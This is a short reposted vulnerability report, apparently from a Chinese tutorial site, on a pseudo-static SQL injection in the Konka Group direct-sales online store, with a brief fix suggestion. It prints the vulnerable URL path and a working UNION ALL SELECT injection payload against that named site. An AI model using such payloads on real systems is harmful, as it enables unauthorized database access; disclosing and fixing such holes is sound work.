好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

康佳集团直销商城伪静态sql注入 - 网站安全 - 自

存在伪静态注入,能够获取 数据库 信息。

 

http://HdhCmsTestled-konka测试数据/pro_cat/55.s html

 

存在伪静态sql注入

 

在/pro_cat/55后可以直接写入注入语句,并返回数据库处理结果

 

 

http://HdhCmsTestled-konka测试数据/pro_cat/55%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x716b777a71,0x567841674e76744a4149,0x7174716a71),NULL,NULL,NULL--%20.shtml

 

 

 

 

修复方案: 过滤敏感字符,或者禁止注入语句的写入。 

 

查看更多关于康佳集团直销商城伪静态sql注入 - 网站安全 - 自的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did14870
  阅读:45次

上一篇: SKCMS上传漏洞 - 网站安全 - 自学php

下一篇:SQL注入与网站定向爆破全过程 - 网

相关资讯